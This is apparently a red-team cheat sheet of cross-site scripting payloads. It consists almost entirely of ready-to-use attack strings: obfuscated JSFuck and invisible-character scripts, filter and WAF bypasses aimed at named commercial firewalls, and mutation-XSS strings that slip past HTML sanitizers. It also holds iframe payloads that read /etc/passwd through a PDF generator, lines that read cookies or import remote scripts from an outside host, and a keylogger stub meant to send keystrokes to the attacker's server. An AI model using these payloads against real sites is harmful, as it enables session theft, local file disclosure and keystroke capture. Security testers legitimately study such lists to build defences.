𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
In search bar
Copy "><img/src=x onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(document.domain)')()"
Invisible Javascript
HTTP Header Exploitation Server Side - PDF Generator
Copy <iframe src=file:///etc/passwd></iframe>
XSS to read local file
Copy < script >
x=new XMLHttpRequest;
document .write ( this .responseText)
</ script >
Copy < img src = "xasdasdasd" onerror = "document.write('<iframe src=file:///etc/passwd></iframe>')" />
Copy < script >document.write('< iframe src =file:///etc/passwd></iframe>');</script>
Prototype Pollution
For Red Teaming
XSS With JSFuck
WAF Bypass
WAF Bypass
Copy "><input%0a%0atype=" hidden "%0a%0aoncontentvisibilityautostatechange=confirm(/Bypassed/)%0d%0astyle=content-visibility:auto>
"><input type=" hidden " oncontentvisibilityautostatechange=" confirm ( /Bypassed/ ) " style=" content - visibility : auto ">
< p oncontentvisibilityautostatechange = "alert(/FirefoxOnly/)" style = "content-visibility:auto" >
Copy # alert(origin):
W=!![];H=(W+"")[3];di="al";me="rt";qq="( origin )";meydi=di+H+me+qq;[]["fill"]["constructor"](meydi)()
Bypass Filters
Copy # Bypass filters
## filter that removes any script tags.
<img src="test" onerror=alert("Hello") />
## alert is filtered
<img src="test" onerror=confirm("Hello") />
## The word hello is filtered
<img src="test" onerror=alert("HHelloello") />
Copy 1) alert = window["al"+"ert"]
2) bypass () with ``
3) replace space with /
4) encode symbols:
< = %3c
> = %3e
" = %22
[ = %5b
] = %5d
` = %60
Copy 1 % 27 / prompt?. ( 1 ) /% 27
* prompt ( document .domain) *
"><img src=x onerrora=confirm() onerror=confirm(1)>
< img //////src=x oNlY=1 oNerror=alert('xxs')//
< img % 20hrEF = "x" % 20sRC = "data:x," % 20oNLy = 1 % 20oNErrOR = prompt1 >
< img / src / onerror = setTimeout ( atob ( /YWxlcnQoMTMzNyk/ .source)) >
< img % 20hrEF = "x" % 20sRC = "data:x," % 20oNLy = 1 % 20oNErrOR = prompt `1` //>
< a + HREF = "%26%237 javascrip%26%239t: alert%261par;document .domain) *>
% 3 CSVG / oNlY = 1 % 20ONlOAD = confirm ( document .domain) % 3 E
& # 34 ; & gt; & lt;track / onerror =& #x27;confirm\ % 601 \ % 60 & #x27; & gt;
< Img Src =OnXSS OnError = { prompt `1` }>
">< img src =x onerrora =confirm() onerror =confirm(1)>
"><div/onclick=" (function(){setTimeout(()%20=>%20alert(document.domain),%200);})();">Click%20me!</div>
<Svg Only =1 OnLoad =confirm(atob("Q2xvdWRmb GFyZSBCeXBhc3NlZCA6KQ =="))>
<inpuT autofocus oNFocus = "setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);" ></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
"><body/onload="{x:onerror = alert};x"
< Img Src =OnXSS OnError =confirm(1)>
Bypass Akamai, Imperva and CloudFlare
Copy <A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
Copy """ontoggle=[JS]
"' "'"ontoggle=[JS]
Use this tricks to bypass alert
block by XSS WAF
Copy (function(x){this[x+`ert`](1)})`al`
< Img Src =OnXSS OnError =alert(1)>
<Img Src = //X55.is OnLoad%0C=import(Src)//
<A AutoFocus HRef %252F=""OnFocus=top/**/?.['al'%2B'ert'](1)>
Amazon / Cloudflare WAF Bypass :
Copy < details x =xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle = "prompt(document.cookie);" >
Copy 1 ">K='><Svg OnLoad=(confirm)(1)>
Copy < a / href = "javascript:Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))" > ClickMe
mXSS (Mutated XSS)
mXSS (Mutated Cross-Site Scripting ) occurs when a browser unexpectedly processes and transforms seemingly safe HTML tags or attributes, allowing malicious scripts to bypass filters and execute.
While libraries like DomPurify are designed to mitigate such attacks, some versions have been exploited by researchers who have discovered new ways to trick the browser and bypass this defense mechanisms.
However, not every developer is aware of DomPurify, or they may choose not to use it for various reasons, opting instead to create their own filters or validators dor safe HTML. This is where mXSS becomes particularly effective in bypassing custum protection measures
Copy < iframe >< style id = "</iframe><img src=1 onerror=alert(1337)>" >
< noframes >< style id = "</noframes><img src=1 onerror=alert(1337)>" >
< noscript >< p id = "</noscript><img src=1 onerror=alert(1337)>" >
< style >< p id = "</style><img src=1 onerror=alert(1337)>" >
< style >< p id = "</style><img src=" 1" onerror = "alert(1337)" >">">
< svg >< style >< img src = "1" onerror = "alert(1337)" >
< math >< style >< img src = "1" onerror = "alert(1337)" >
< math >< style ></ style ></ math >< img src = "1" onerror = "alert(1337)" >
< select >< style >< input >< img src =1 onerror =alert(1337)></select>
<select></select><input><img src = "1" onerror = "alert(1337)" >
< body >< title >< p id = "</title><img src onerror=alert(1337)>" ></ title >
< body >< noscript >< p id = "</noscript><img src onerror=alert(1337)>" >
< maths >< style ><!--</ style >< img src onerror =alert(1337)>--></style></maths>
<svg><style>/*<img src onerror =alert(1337)>*/</style></svg>
<math><style>/*<img src onerror =alert(1337)>*/
<noscript><style>/*</noscript><img src onerror =alert(1337)>*/
<math><annotation-xml><style><img src onerror =alert(1337)></style></annotation-xml></math>
<body><textarea><a is = "</textarea><img src onerror=alert(1337)>" >
< math >< annotation-xml encoding = "text/html" >< x >< svg >< mtext >< textarea >< a is = "</textarea><img src onerror=alert(1337)>" >
< form >< math >< mtext ></ form >< form >< mglyph >< svg >< mtext >< title >< path is = "</title><img src onerror=alert(1337)>" >
Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
Copy < Img Src =OnXSS OnError =confirm(document.cookie)>
Copy ‘ > alert ( 154 ) </ script >< script / 154 = ’;;;;;;;
Copy < Svg Only =1 OnLoad =confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
Copy < svg / onload = window[ "al" + "ert" ]( 1337 ) >
< Img Src =OnXSS OnError =confirm(1337)>
<Svg Only =1 OnLoad =confirm(document.domain)>
<svg onload =alert(document.cookie)>
<Img Src = //X55.is OnLoad%0C=import(Src)>
<Svg Only =1 OnLoad =confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
OnXSS =<Img/Src/OnError=alert(1)>
'<00 foo=" <a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/
Copy ">'><details/open/ontoggle=confirm('XSS')>
6 '%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/*aabb*/[' al '%2b' ert '](document./*aabb*/location);//
">%0D%0A%0D%0A<x '=" foo "><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>
Copy < a % 20href =% 0dj & Tab;avascript & colon;x = 'trela' .split ( '' ) .reverse () .join ( '' );self[x](origin) >
Copy '"><A HRef=\" AutoFocus OnFocus=top/**/?.[' ale '%2B' rt '](document%2Bcookie)>
Akamai: Stored XSS via cache poisoning https://twitter.com/WllGates/status/1788179999100444802
Copy "><a nope=" % 26quot;x % 26quot; "onmouseover=" Reflect .get (frames , 'ale' + 'rt' )( Reflect .get (document , 'coo' + 'kie' )) ">
Copy '"><A HRef=" AutoFocus OnFocus=top/**/?.' ale '%2B' rt '>"
';k=' e '%0Atop[' al '+k+' rt '](1)//
'"><A HRef=\" AutoFocus OnFocus=top/**/?.[' ale '%2B' rt '](1)>
In Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:
Copy /login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529
Copy < Img Src = //X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter = "location=javas+cript:ale+rt%2+81%2+9;//</div" >
< details x =xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle =a
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
Copy <a aa aaa aaaa aaaaaa href=javascript:alert(document.cookie)>ClickMe
<a href="javascript:alert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window.location.href='https://evil.com';">ClickMe</a>
Amazon WAF
Copy <details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
Copy <svg onload='new Function["Y000!"].find(al\u0065rt)'>
Copy <img src=x onerror=alert(document.domain)//
Copy %3Csvg+on+onload%3D%28alert%29%28document.domain%29%3E
Copy 'a'.replace.call`1${/./}${alert}`/
Copy [alert][0].call(this,1)
Stored XSS
Copy https://www\.target\.com/redirectEndpoint.do?redirectPage=redacted&itemFromOrder="'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))>
Copy # Keylogger example - Source TryHackMe
<script type="text/javascript">
let l = ""; // Variable to store key-strokes in
document.onkeypress = function (e) { // Event to listen for key presses
l += e.key; // If user types, log it to the l variable
console.log(l); // update this line to post to your own server
See XSS Discovery for more tools